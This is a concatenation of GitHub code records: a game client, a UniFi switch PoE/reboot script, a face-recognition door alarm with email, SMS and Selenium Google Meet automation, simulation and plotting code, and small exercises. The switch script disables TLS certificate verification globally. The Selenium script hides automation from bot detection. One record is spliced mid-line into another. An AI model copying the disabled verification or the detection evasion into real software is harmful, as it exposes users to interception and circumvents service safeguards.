self.selected_hand\n\n if self.hand[selected] != msg.tileid:\n try:\n selected = self.hand.index(msg.tileid)\n except ValueError:\n return\n\n self.hand[selected] = None\n self.handrotations[selected] = 0\n\n self.event_generate(\"<>\")\n\n redrawtokens = False\n\n with self.boardlock:\n self.lasttilelocation = (msg.x, msg.y)\n if self.location == None:\n redrawtokens = True\n\n if redrawtokens:\n self.event_generate(\"<>\")\n\n def set_player_eliminated(self, idnum):\n\n with self.boardlock:\n with self.infolock:\n if idnum in self.playerlist:\n self.playerlist.remove(idnum)\n else:\n pass\n self.playerlistvar.set([self.playernames[i] for i in self.playerlist])\n\n if not idnum in self.eliminatedlist:\n self.eliminatedlist.append(idnum)\n\n self.event_generate(\"<>\")\n self.event_generate(\"<>\")\n\n def token_moved(self, msg):\n with self.boardlock:\n if msg.idnum == self.idnum:\n self.location = (msg.x, msg.y, msg.position)\n self.board.update_player_position(msg.idnum, msg.x, msg.y, msg.position)\n\n self.event_generate(\"<>\")\n\n def add_tile_to_hand(self, tileid):\n with self.handlock:\n for i in range(len(self.hand)):\n if self.hand[i] == None:\n self.hand[i] = tileid\n self.handrotations[i] = 0\n break\n self.event_generate(\"<>\")\n\n def on_quit(self):\n\n if self.game_runing:\n 
self.sock.send(protocol.MessageLeaveGame(self.idnum).pack())\n if self.parent:\n self.parent.destroy()\n","repo_name":"SleepyVirino/cits3002_2021_project","sub_path":"client/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15124903544","text":"#!/usr/bin/python3\nimport json\nimport os\nimport urllib.request\nimport ssl\nimport time\nimport getopt\nimport sys\nimport util\n\nssl._create_default_https_context = ssl._create_unverified_context\n\ndef req(method, endpoint, data, headers = {}):\n base_url = \"https://%s/\" % (os.environ[\"SWITCH_HOST\"])\n url = \"%s%s\" % (base_url, endpoint)\n\n headers = {\n \"Content-Type\": \"application/json\",\n \"Referer\": base_url,\n **headers\n }\n\n if method == \"GET\":\n req = urllib.request.Request(url, headers=headers, method=method)\n else:\n params = json.dumps(data).encode(\"utf8\")\n req = urllib.request.Request(url, data=params,\n headers=headers, method=method)\n try: response = urllib.request.urlopen(req)\n except urllib.error.HTTPError as e:\n util.prnt(\"[unify] %s\" % str(e), util.LOG_ERR)\n response = e\n except urllib.error.URLError as e:\n util.prnt(\"[unify] %s\" % str(e), util.LOG_ERR)\n response = e\n\n return response\n\ndef switch_ports():\n ports = os.environ[\"SWITCH_PORTS\"].split(\",\")\n token = auth()\n resp = req(\"GET\", \"api/v1.0/interfaces\", {}, {\"x-auth-token\": token})\n\n if resp.getcode() == 200:\n interfaces = json.loads(resp.read().decode(\"utf-8\"))\n for interface in interfaces:\n if interface[\"identification\"][\"id\"] in ports:\n original_status = interface[\"port\"][\"poe\"]\n interface[\"port\"][\"poe\"] = \"off\"\n resp = req(\"PUT\", \"api/v1.0/interfaces\", interface, {\"x-auth-token\": token})\n if resp.getcode() == 200:\n time.sleep(5)\n interface[\"port\"][\"poe\"] = original_status\n resp = req(\"PUT\", \"api/v1.0/interfaces\", interface, {\"x-auth-token\": token})\n if resp.getcode() == 200:\n util.prnt(\"[unify] Switched POE for port %s successfully\" % (interface[\"identification\"][\"id\"]))\n return True\n\n util.prnt(\"[unify] Failed to get POE back for port %s\" % (interface[\"identification\"][\"id\"]), util.LOG_ERR)\n return False\n else:\n util.prnt(\"[unify] Failed to switch POE off for port %s\" % (interface[\"identification\"][\"id\"]), util.LOG_ERR)\n return False\n else:\n util.prnt(\"[unify] Failed to get interfaces list\", util.LOG_ERR)\n\n return False\n\ndef reboot():\n token = auth()\n\n resp = req(\"GET\", \"api/v1.0/system/reboot\", {}, {\"x-auth-token\": token})\n if resp.getcode() == 200:\n util.prnt(\"[unify] Rebooted successfully\")\n return True\n\n util.prnt(\"[unify] Failed to reboot\", util.LOG_ERR)\n return False\n\ndef parse_options():\n\n try:\n opts, args = getopt.getopt(sys.argv[2:], \"c:\")\n except Exception as e:\n opts = []\n\n if (not opts):\n print(\"dio unify -c \")\n sys.exit(1)\n\n return opts[0][1]\n\ndef auth():\n token = \"\"\n resp = req(\"POST\", \"api/v1.0/user/login\", {\n \"username\": os.environ[\"SWITCH_USERNAME\"],\n \"password\": os.environ[\"SWITCH_PASSWORD\"]\n })\n\n if resp.getcode() == 200:\n headers = dict(resp.info())\n if \"x-auth-token\" in headers:\n token = headers[\"x-auth-token\"]\n else:\n util.prnt(\"[unify] Failed to get auth token from headers\", util.LOG_ERR)\n else:\n util.prnt(\"[unify] Failed to authenticate\", util.LOG_ERR)\n\n return token\n\n\ndef main():\n\n cmd = parse_options()\n 
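`req` in the unify script returns either a live response or the caught error object, and callers immediately probe `getcode()`. A sketch of a retry wrapper that could sit on top of that contract; the `with_retries` name and the linear backoff are assumptions, not part of the module:

```python
import time

def with_retries(call, attempts=3, delay=2.0):
    """Invoke call() until it yields an object whose getcode() is 200.

    Hypothetical wrapper: urllib's URLError has no getcode(), hence the
    hasattr guard; the last response is returned either way, mirroring
    the contract of req() above.
    """
    resp = None
    for i in range(attempts):
        resp = call()
        if hasattr(resp, "getcode") and resp.getcode() == 200:
            return resp
        time.sleep(delay * (i + 1))  # back off before the next attempt
    return resp
```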
if cmd == \"switch_ports\":\n switch_ports()\n elif cmd == \"reboot\":\n reboot()\n\n","repo_name":"bzzeke/wb-rules","sub_path":"services/modules/unify/unify.py","file_name":"unify.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14272092922","text":"from asyncio.windows_events import NULL\nimport cv2\nimport smtplib\nimport imghdr\nimport threading\nimport os\nimport sys\nfrom deepface import DeepFace\nfrom email.message import EmailMessage\nfrom PIL import Image\nfrom jinja2 import pass_environment\nfrom twilio.rest import Client\nimport tkinter as tk\nfrom attr import s\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\nfrom credentials import *\n\nflag=0\ncount=0\nframe=0\nframe1=NULL\nLINK=\"\"\nname=['']\naccess=['']\nvideo_capture=0\n\ndef web_cam():\n global video_capture\n global flag,count,frame,name,access\n cascPath = \"haarcascade_frontalface_default.xml\"\n faceCascade = cv2.CascadeClassifier(cascPath)\n\n video_capture = cv2.VideoCapture(0)\n no_face=0 \n down=0\n x=0\n y=0\n while True:\n ret, frame = video_capture.read()\n try:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n #to detect faces in each frame\n faces = faceCascade.detectMultiScale( \n gray,\n scaleFactor=1.1,\n minNeighbors=5, \n minSize=(200, 200),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n #to save image and draw rectangle when face is detected \n \n for (x, y, w, h) in faces:\n filename = 'faces/ddd.jpg'\n no_face=1\n cv2.imwrite(filename, frame)\n cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)\n \n count=count+1\n down=down+1\n\n if no_face==0:\n name[0]=''\n access[0]=''\n\n cv2.putText(frame,name[0],(x,y-10),cv2.FONT_HERSHEY_SIMPLEX, 0.8,(0, 255, 0), 1)\n cv2.putText(frame,access[0],(220,440),cv2.FONT_HERSHEY_SIMPLEX, 1,(0, 255, 0), 4) \n #to call verify function\n #call verify function only when the previous thread has finish execution\n if flag==0 and no_face==1 and down>100: \n flag=1\n while(True):\n try:\n t1 = threading.Thread(target=verify, args=())\n break\n except:\n print(\"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@verify\")\n pass\n down=0\n t1.start()\n\n #down=down+1\n no_face=0\n cv2.imshow('Video', frame)\n \n except:\n if flag==0:\n video_capture = cv2.VideoCapture(0)\n print(\"CAMERA TURNED ON\")\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n video_capture.release()\n cv2.destroyAllWindows()\n\n\n#function to perform face verification\ndef verify():\n global flag,count,frame,name\n models = [\"VGG-Face\", \"Facenet\", \"Facenet512\", \"OpenFace\", \"DeepFace\", \"DeepID\", \"ArcFace\", \"Dlib\", \"SFace\"]\n detectors = [\"opencv\", \"ssd\", \"mtcnn\", \"dlib\", \"retinaface\"]\n metrics = [\"cosine\", \"euclidean\", \"euclidean_l2\"]\n \n\n #comparing faces with the owners of the house.\n try:\n for file in os.listdir(\"owners\"):\n print(\"\\tOwners : \",file)\n verification=DeepFace.verify(\n img1_path=\"faces\\\\ddd.jpg\",\n img2_path=\"owners\\\\\"+file,\n model_name = models[2], distance_metric = metrics[1],\n detector_backend = detectors[1],\n enforce_detection=False)\n\n if verification.get('verified')==True:\n name=file.split('.')\n if(name[0].startswith(\"1\")):\n access[0]='Hello '+name[0][1:]\n filename = 'owners/'+'1'+file[1:]\n name[0]=name[0][1:]\n else:\n access[0]='Hello '+name[0]\n filename = 'owners/'+'1'+file\n \n print(\"%%%%%%%%%%%%%%%%% Access 
Granted %%%%%%%%%%%%%%%%\")\n current_owner=cv2.imread('owners/'+file)\n \n cv2.imwrite(filename, current_owner)\n flag=0\n count=0\n return\n except:\n print(\"%%%%%%%%%%%%%%%%%% No face deteacted %%%%%%%%%%%%%%%\")\n\n\n print(\"%%%%%%%%%%%%%%%%%%Comparing stranger face%%%%%%%%%%%%%%%%%%\")\n #comparing faces with last stranger's face so that email will not be sent again.\n try:\n for file in os.listdir(\"stranger\"):\n print(\"\\tStranger : \",file)\n verification=DeepFace.verify(\n img1_path=\"faces\\\\ddd.jpg\",\n img2_path=\"stranger\\\\\"+file,\n model_name = models[-2], distance_metric = metrics[-2],\n detector_backend = detectors[0],\n enforce_detection=False)\n if verification.get('verified')==True:\n name[0]='Stranger'\n access[0]='Access Denied'\n print(\"%%%%%%%%%%%%%%%%% Stranger again no email sent %%%%%%%%%%%%%%%%\")\n print(count)\n flag=0\n count=0\n return\n except:\n print(\"Stranger comparing error\")\n \n \n \n print('mail sending')\n filename1 = 'stranger/star.jpg'\n name[0]='Stranger'\n access[0]='Access Denied'\n cv2.imwrite(filename1, frame)\n while(True):\n try:\n t2 = threading.Thread(target=email_send, args=())\n t3 = threading.Thread(target=gui, args=())\n t2.start()\n t3.start()\n break\n except:\n print(count)\n print(\"@@@@@@@@@@@@@@@@@@@@@@stranger\")\n pass\n\n\n\n#function to send email notification to owner with stranger's image.\ndef email_send():\n msg=EmailMessage()\n msg['Subject']='Home Security'\n msg['From']='mysmart99mail@gmail.com'\n msg['To']='XXXXXXXXXXXXXXX@gmail.com'\n msg.set_content('An unknown face has been recognized at your doorlock!Image attached!!')\n \n with open('stranger\\\\star.jpg','rb') as f:\n file_data=f.read()\n file_type=imghdr.what(f.name)\n file_name=f.name\n\n msg.add_attachment(file_data,maintype='image',subtype=file_type,filename=file_name)\n\n with smtplib.SMTP('smtp.gmail.com',587) as smtp:\n smtp.ehlo()\n smtp.starttls()\n smtp.ehlo()\n smtp.login(\"mysmart99mail@gmail.com\",email_c)\n \n #image added\n #sfv\n smtp.send_message(msg)\n print(\"mail sent\")\n\n\ndef sms_send():\n global LINK,flag\n client = Client(account_sid, auth_token) \n \n message = client.messages.create( \n messaging_service_sid=msg_sid, \n body='ALERT; Video call link :'+str(LINK), \n to='+91XXXXXXXXXX' \n ) \n \n print(\"sms sent\")\n\n\ndef gui():\n print('the print')\n parent = tk.Tk()\n parent.geometry('300x100')\n print('the print1')\n\n frame1 = tk.Frame(parent)\n frame1.pack()\n print('the prin2')\n text_lab=tk.Label(parent, text='Do You want to call?').place(x=40,y=10)\n\n\n text_disp= tk.Button(frame1, \n text=\"Yes\", \n command=lambda: fun(parent))\n\n text_disp.pack(side=tk.LEFT,padx=25, pady=40)\n\n exit_button = tk.Button(frame1,\n text=\"No\",\n fg=\"black\",\n command=lambda: QUIT(parent))\n exit_button.pack(side=tk.RIGHT,padx=35,pady=40)\n print('the print4')\n parent.mainloop()\n\ndef on_closing():\n global flag\n flag=0\n print(\"ebfhrud\")\n\n\ndef QUIT(parent):\n global flag\n flag=0\n parent.quit()\n \n\ndef video_call(driver,mail_address,password):\n \n global LINK\n while(True):\n try:\n s=driver.find_element(\"xpath\",'//*[@id=\"drawer\"]/div/div[3]/div[1]/div/span[1]/a')\n s.click()\n print(\"sign in\")\n break\n except:\n pass\n\n #adding a wait so that next page load\n driver.implicitly_wait(2)\n\n # input Gmail\n #input username\n while(True):\n try:\n username=driver.find_element(\"xpath\",'//*[@id=\"identifierId\"]')\n username.click()\n username.send_keys(mail_address)\n\n #click next\n 
next1=driver.find_element(\"xpath\",'//*[@id=\"identifierNext\"]')\n next1.click()\n print(\"enter user name\")\n break\n except:\n pass\n \n #adding a wait so that next page load\n driver.implicitly_wait(2)\n # input Password\n while(True):\n try:\n pswd=driver.find_element(\"xpath\",'//*[@id=\"password\"]/div[1]/div/div[1]/input')\n pswd.click()\n pswd.send_keys(password)\n\n #click next\n next2=driver.find_element(\"xpath\",'//*[@id=\"passwordNext\"]')\n next2.click()\n print(\"password entered\")\n break\n except:\n pass\n #adding a wait so that next page load\n driver.implicitly_wait(7)\n\n\n while(True):\n try:\n start_button=driver.find_element(\"xpath\",'//*[@id=\"yDmH0d\"]/c-wiz/div/div[2]/div/div[1]/div[3]/div/div[1]/div[1]/div/button/span')\n start_button.click()\n\n\n call_button=driver.find_element(\"xpath\",'//*[@id=\"yDmH0d\"]/c-wiz/div/div[2]/div/div[1]/div[3]/div/div[1]/div[2]/div/ul/li[2]/span[3]')\n call_button.click()\n print(\"Call pressed\")\n break\n except:\n pass\n \n\n \n \n while(True):\n try:\n driver.implicitly_wait(7)\n ex=driver.find_element(\"xpath\",'//*[@id=\"ow3\"]/div[1]/div/div[10]/div[3]/div[10]/div[3]/div[3]/div/div/div[1]/span/button')\n\n ex.click()\n\n link=driver.find_element(\"xpath\",'//*[@id=\"ow3\"]/div[1]/div/div[10]/div[3]/div[4]/div[2]/div[2]/div[1]/div[2]/div[2]/div[1]')\n print(link.text)\n LINK=link.text\n sms_send()\n break\n except:\n pass\n \n\n\n\n\n\n\ndef fun(parent):\n\n global flag,count,video_capture\n video_capture.release()\n print(\"CAMERA TURNED OFF\")\n\n # create chrome instance\n opt=webdriver.ChromeOptions()\n opt.add_experimental_option('excludeSwitches', ['enable-logging'])\n opt.add_argument('--disable-blink-features=AutomationControlled')\n opt.add_argument('--start-maximized') #chrome browser will always open in full screen\n opt.add_argument('--disable-extensions') #disable all chrome extension\n\n #pass the arguments 1 to allow and 2 to block\n opt.add_experimental_option(\"prefs\", {\n \"profile.default_content_setting_values.media_stream_mic\": 1,\n \"profile.default_content_setting_values.media_stream_camera\": 1,\n \"profile.default_content_setting_values.geolocation\": 2,\n \"profile.default_content_setting_values.notifications\": 1\n })\n\n #Gives path to chrome webdriver and loads classroom webpage\n driver = webdriver.Chrome(options=opt,service=Service(ChromeDriverManager().install()))\n\n driver.get(\n 'https://apps.google.com/meet/?hs=197')\n video_call(driver,user_name,password)\n\n\n is_closed=False\n while(not is_closed):\n try:\n isc=driver.find_element(\"xpath\",'//*[@id=\"ow3\"]/div[1]/div/div[10]/div[3]/div[10]/div[3]/div[3]/div/div/div[1]/span/button')\n except:\n is_closed=True\n flag=0\n count=0\n parent.quit() \n\n\n","repo_name":"HEMALSEBASTIAN/face-detection","sub_path":"combined3.py","file_name":"combined3.py","file_ext":"py","file_size_in_byte":11503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21929769648","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the catAndMouse function below.\ndef catAndMouse(x, y, z):\n kcA=abs(z-x)\n kcB=abs(z-y)\n if (kcA==kcB):\n return \"Mouse C\"\n elif (kcA 0\n array_mend_1st_direc_index = np.array(mend_1st_direc_index).squeeze()\n _1st_comp_direc[array_mend_1st_direc_index] = - _1st_comp_direc[array_mend_1st_direc_index]\n # print('_1st_comp_direc:',_1st_comp_direc)\n # self.out1st = _1st_comp_direc\n _2nd_comp_direc = 
self.Normalize(self.eFV)\n ## self.Number_of_BladeElements x 3-dim\n # print('_2nd_comp_direc',_2nd_comp_direc)\n\n _3rd_and_4th_comp_direc_single = np.cross(np.array(self.LERT.transpose())[0,:], np.array(self.chordD.transpose())[0,:])\n _3rd_and_4th_comp_direc \\\n = np.matrix(np.tile(_3rd_and_4th_comp_direc_single, (self.Number_of_BladeElements,1)))\n mend_3rd_and_4th_comp_direc_index = np.dot(self.eFV, _3rd_and_4th_comp_direc_single) < 0\n array_mend_3rd_and_4th_comp_direc_index = np.array(mend_3rd_and_4th_comp_direc_index).squeeze()\n _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index] =\\\n - _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index]\n # print('_3rd_and_4th_comp_direc:',_3rd_and_4th_comp_direc)\n # _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index] = - _3rd_and_4th_comp_direc[array_mend_3rd_and_4th_comp_direc_index]\n ## 1 x 3-dim F_r and F_a share the same direction\n # print('np.array(self.LERT.transpose())[0,:]:', np.array(self.LERT.transpose())[0,:])\n # print('np.array(self.chordD.transpose())[0,:]:', np.array(self.chordD.transpose())[0,:])\n # print('_3rd_and_4th_comp_direc:', _3rd_and_4th_comp_direc)\n\n #################### Amplitude and direction composation ###############\n # self. F_t_lift_per_BE = np.multiply(np.transpose(np.mat(F_t_lift_amp)),_1st_comp_direc) ## self.Number_of_BladeElements x 3-dim\n # self. F_t_drag_per_BE = np.multiply(np.transpose(np.mat(F_t_drag_amp)),_2nd_comp_direc) ## self.Number_of_BladeElements x 3-dim\n # self. F_r_per_BE = np.outer (np.transpose(np.mat(F_r_amp)), _3rd_and_4th_comp_direc) ## self.Number_of_BladeElements x 3-dim\n # self. F_a_per_BE = np.outer (np.transpose(np.mat(F_a_amp)), _3rd_and_4th_comp_direc) ## self.Number_of_BladeElements x 3-dim\n\n Sum_abs_of_F_t_lift_amp = np.sum(np.abs(F_t_lift_amp))\n Sum_abs_of_F_r_amp = np.sum(np.abs(F_r_amp))\n Sum_abs_of_F_a_amp = np.sum(np.abs(F_a_amp))\n \n Sign_sum_of_F_t_lift_amp = np.sign(np.sum(F_t_lift_amp))\n Sign_sum_of_F_r_amp = np.sign(np.sum(F_r_amp))\n Sign_sum_of_F_a_amp = np.sign(np.sum(F_a_amp))\n\n if Sum_abs_of_F_t_lift_amp > self.SMALL_CONSTANT_4_NOMALIZATION:\n Weighted_F_t_lift_amp = Sign_sum_of_F_t_lift_amp * F_t_lift_amp / (Sum_abs_of_F_t_lift_amp + self.SMALL_CONSTANT_4_NOMALIZATION)\n else:\n Weighted_F_t_lift_amp = 1 / self.Number_of_BladeElements\n\n if Sum_abs_of_F_r_amp > self.SMALL_CONSTANT_4_NOMALIZATION:\n Weighted_F_r_amp = Sign_sum_of_F_r_amp * F_r_amp / (Sum_abs_of_F_r_amp + self.SMALL_CONSTANT_4_NOMALIZATION)\n else:\n Weighted_F_r_amp = 1 / self.Number_of_BladeElements\n\n if Sum_abs_of_F_a_amp > self.SMALL_CONSTANT_4_NOMALIZATION:\n Weighted_F_a_amp = Sign_sum_of_F_a_amp * F_a_amp / (Sum_abs_of_F_a_amp+ self.SMALL_CONSTANT_4_NOMALIZATION)\n else:\n Weighted_F_a_amp = 1 / self.Number_of_BladeElements\n\n\n\n # print('Weighted_F_t_lift_amp:',Weighted_F_t_lift_amp)\n # print('Weighted_F_r_amp:',Weighted_F_r_amp)\n # print('Weighted_F_a_amp:', Sum_of_F_a_amp)\n # print('F_r_amp',F_r_amp)\n ### Below are the results\n self. F_t_lift = np.multiply(F_t_lift_amp, _1st_comp_direc) ## 检查求和及相乘的顺序\n self. F_t_drag = np.multiply(F_t_drag_amp, _2nd_comp_direc)\n self. F_r = np.multiply(F_r_amp, _3rd_and_4th_comp_direc) ## 检查计算方法\n self. 
F_a = np.multiply(F_a_amp, _3rd_and_4th_comp_direc)\n # print('F_t_lift:', np.sum(self.F_t_lift, axis = 0))\n # print('F_t_drag:', np.sum(self.F_t_drag, axis = 0))\n # print('F_r:', np.sum(self.F_r, axis = 0))\n # print('F_a:', np.sum(self.F_a, axis = 0))\n\n raw_X_pos_t = np.sum(np.multiply(Weighted_F_t_lift_amp, np.mat(self.x_data).transpose()))\n raw_X_pos_r = np.sum(np.multiply(Weighted_F_r_amp, np.mat(self.x_data).transpose())) ##或许应该求算数平均数\n raw_X_pos_a = np.sum(np.multiply(Weighted_F_a_amp, np.mat(self.x_data).transpose()))\n\n\n raw_Y_pos_t = - np.sum(np.multiply(np.multiply(Weighted_F_t_lift_amp, np.mat(np.abs(self.y_data)).transpose()),\\\n (np.abs(-self.AoA.transpose()+np.pi)/np.pi).transpose()))\n raw_Y_pos_r = - 0.5 * np.sum(np.multiply(Weighted_F_r_amp, np.mat(np.abs(self.y_data)).transpose()))\n raw_Y_pos_a = - 0.5625 * np.sum(np.multiply(Weighted_F_a_amp, np.mat(np.abs(self.y_data)).transpose()))\n\n raw_pos_t = np.array(np.matmul(self.virturalWingPlaneRelative2Wing.transpose(), np.array([raw_X_pos_t, raw_Y_pos_t, 0]))).squeeze()\n raw_pos_r = np.array(np.matmul(self.virturalWingPlaneRelative2Wing.transpose(), np.array([raw_X_pos_r, raw_Y_pos_r, 0]))).squeeze()\n raw_pos_a = np.array(np.matmul(self.virturalWingPlaneRelative2Wing.transpose(), np.array([raw_X_pos_a, raw_Y_pos_a, 0]))).squeeze()\n \n # print(raw_pos_t)\n self. X_pos_t = raw_pos_t[0]\n self. Y_pos_t = raw_pos_t[1]\n \n self. X_pos_r = raw_pos_r[0]\n self. Y_pos_r = raw_pos_r[1]\n \n self. X_pos_a = raw_pos_a[0]\n self. Y_pos_a = raw_pos_a[1]\n ### We need the relationship graph\n ## And we need initialize all the parameters in the _init_\n\n\n\n\n\n\n","repo_name":"Chainplain/FlappingwingSimu","sub_path":"Bladelement.py","file_name":"Bladelement.py","file_ext":"py","file_size_in_byte":25142,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"9981776876","text":"import numpy as np\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport numpy as np\nfrom utils.envelope_process import envelope\nfrom utils.filter import iir_design_filter\nimport matlab.engine\neng = matlab.engine.start_matlab()\nconfig = {\n \"font.family\": 'Times New Roman',\n}\nrcParams.update(config)\n\ndef process_data(data):\n data = data * 5 / 1024\n # data = (data - min(data)) / (max(data) - min(data))\n F = iir_design_filter(f_pass=40.0, f_stop=48.0, a_pass=1.0, a_stop=80.0) # f_pass=40.0, f_stop=48.0, a_pass=1.0, a_stop=80.0\n filtered_data = F.filter_(raw_data=data)\n upper, _ = envelope(filtered_data, 100).start()\n upper = upper.reshape(-1)\n smooth = matlab.double(initializer=list(upper), size=(1, len(upper)), is_complex=False)\n smooth = eng.smoothdata(smooth, 'gaussian', 300, nargout=1)\n smooth = smooth[0]\n \n return data[int(2302 * 2):], filtered_data[int(2302 * 2):], upper[int(2302 * 2):], smooth[int(2302 * 2):]\n\nytick_marks = [1.0, 2.0, 3.0]\ntime = 10\nt = np.linspace(0, time, int(2302 * time))\nplt.figure(figsize=(18, 6))\n\nraw_data = np.loadtxt('YCW_8s_1.csv', delimiter=',')\ndata, filtered_data, upper, smooth = process_data(raw_data)\nnp.savetxt('smooth_data.csv', smooth)\n# plt.subplot(1, 2, (1, 2))\n# plt.plot(time, data, label='Original Signal', linewidth=3, color='#1f77b4')\n# plt.plot(time, filtered_data, label='Filtered Signal', linewidth=3, color='#ff7f0e')\n# plt.xticks(fontsize=30, weight=10)\n# plt.yticks([0, 2.5, 5], fontsize=30, weight=10)\n# plt.ylabel('Voltage (V)', 
fontsize=30)\n# plt.xlabel('Time (s)', fontsize=30)\n# plt.legend(fontsize=24, loc='upper right')\n# plt.ylim([0,5])\n# plt.xlim([0,14])\n# plt.tight_layout()\n\n\nplt.subplot(1, 2, 1)\nplt.plot(t, filtered_data, label='Filtered Signal', linewidth=3, color='#ff7f0e')\nplt.plot(t, upper, label='Enveloped Signal', linewidth=3, color='#2ca02c')\nplt.xticks([0, 2, 4, 6, 8, 10], fontsize=40, weight=10)\nplt.yticks([1, 2], fontsize=40, weight=10)\nplt.ylabel('Voltage (V)', fontsize=40)\nplt.xlabel('Time (s)', fontsize=40)\nplt.legend(fontsize=35, loc='upper left')\nplt.ylim([0.8, 2.2])\nplt.xlim([0,10])\nplt.tight_layout()\n\nplt.subplot(1, 2, 2)\nplt.plot(t, filtered_data, label='Filtered Signal', linewidth=3, color='#ff7f0e')\nplt.plot(t, upper, label='Enveloped Signal', linewidth=3, color='#2ca02c')\nplt.yticks([1], fontsize=40, weight=10)\nplt.xticks([3, 4, 5], fontsize=40, weight=10)\nplt.ylabel('Voltage (V)', fontsize=40)\nplt.xlabel('Time (s)', fontsize=40)\n# plt.legend(fontsize=25, loc='upper right')\nplt.ylim([0.9, 1.7])\nplt.xlim([3, 5])\nplt.tight_layout()\n\n# plt.subplot(1, 2, 2)\n# plt.plot(t, filtered_data, label='Filtered Signal', linewidth=2, color='#ff7f0e')\n# plt.plot(t, upper, label='Envelope Signal', linewidth=3, color='#2ca02c')\n# plt.yticks([1], fontsize=25, weight=10)\n# plt.xticks([3, 4, 5], fontsize=25, weight=10)\n# plt.ylabel('Voltage (V)', fontsize=30)\n# plt.xlabel('Time (s)', fontsize=30)\n# plt.legend(fontsize=25, loc='upper right')\n# plt.ylim([0.9, 1.7])\n# plt.xlim([3, 5])\n# plt.tight_layout()\n\nplt.show()","repo_name":"Dominique-Yiu/National-IS-Contest","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37249064019","text":"import itertools\r\n\r\nn, m = map(int,input().split())\r\n\r\n_list = []\r\nfor i in range(1,n+1):\r\n _list.append(i)\r\n\r\niter = itertools.permutations(_list, m)\r\n\r\nfor j in iter:\r\n print(' '.join(map(str, j)))","repo_name":"Junho1224/junQ","sub_path":"백준/Silver/15649. 
N과 M (1)/N과 M (1).py","file_name":"N과 M (1).py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"15007901996","text":"import argparse\nimport os\n\ntry:\n import colorama\n import pdfkit\n from colorama import Fore, Style, init\nexcept ModuleNotFoundError as e:\n print(f\"Gerekli modülleri yükleyin: 'python -m pip install {e.name}'\")\n\ninit(autoreset=True)\n\n# https://github.com/wkhtmltopdf/wkhtmltopdf/releases\n# choco install wkhtmltopdf\npath_wkthmltopdf = r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\nconfig = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)\ncss = r\"C:\\Users\\Yedhrab\\Desktop\\workspace\\markdown-pdf.css\"\n\nparser = argparse.ArgumentParser(description='HTML to PDF.')\nparser.add_argument(\n '--input-dir',\n '-i',\n dest=\"inputDir\",\n default=os.getcwd(),\n help='Path of html items',\n type=str,\n)\nparser.add_argument(\n '--output',\n \"-o\",\n dest=\"outDir\",\n default=\"out\",\n help='Pdf outputs destionation (default \"out\")',\n)\nparser.add_argument(\n '--css',\n \"-c\",\n dest=\"css\",\n default=None,\n help='Custom css style for PDF (default None)',\n)\n\nargs = parser.parse_args()\n\noutDir = os.path.join(args.inputDir, args.outDir)\nif not os.path.exists(outDir):\n os.mkdir(outDir)\n\nfor name in os.listdir(args.inputDir):\n if \".html\" in name:\n _input = os.path.join(args.inputDir, name)\n _output = os.path.join(outDir, name.replace('.html', ''))\n\n print(Fore.CYAN + f\"Converting: {_input}\")\n\n try:\n if args.css is None:\n pdfkit.from_file(\n f\"{_input}\", f\"{_output}.pdf\", configuration=config)\n else:\n pdfkit.from_file(f\"{_input}\", f\"{_output}.pdf\",\n configuration=config, css=css)\n print(Fore.GREEN + \"Succes!\")\n except Exception as e:\n print(Fore.YELLOW + f\"Error while converting.\")\n","repo_name":"yemreak/yScripts","sub_path":"Python Script/html_to_pdf.py","file_name":"html_to_pdf.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"8037498605","text":"class Object:\n def __init__(self, name, id, mass, pos, vel):\n self.name = name\n self.id = id\n self.mass = mass\n self.pos = {\n 'x': pos[0],\n 'y': pos[1],\n 'z': pos[2]\n }\n self.vel = {\n 'x': vel[0],\n 'y': vel[1],\n 'z': vel[2]\n }\n \n def distance(self, obj):\n return (\n obj.pos['x'] - self.pos['x'],\n obj.pos['y'] - self.pos['y'],\n obj.pos['z'] - self.pos['z']\n )","repo_name":"damianobacchin/three-body-problem","sub_path":"models/object.py","file_name":"object.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72276547441","text":"#!/usr/bin/python\n\nimport logging\nfrom pymongo import MongoClient\nfrom gridfs import GridFS\nfrom object import Object\nfrom config import Config\n\n\nclass Database:\n client = None\n db = None\n fs = None\n isOperable = False\n\n position_selector = {\n 'key': 'position'\n }\n\n def __init__(self):\n try:\n keys = {'serverSelectionTimeoutMS': 4000}\n self.client = MongoClient(Config.DB_HOST, Config.DB_PORT)\n self.client.database_names()\n self.db = self.client[Config.DB_NAME]\n logging.info(\"Connected to mongo... ok\")\n\n self.fs = GridFS(self.db)\n logging.info(\"GridFS link... 
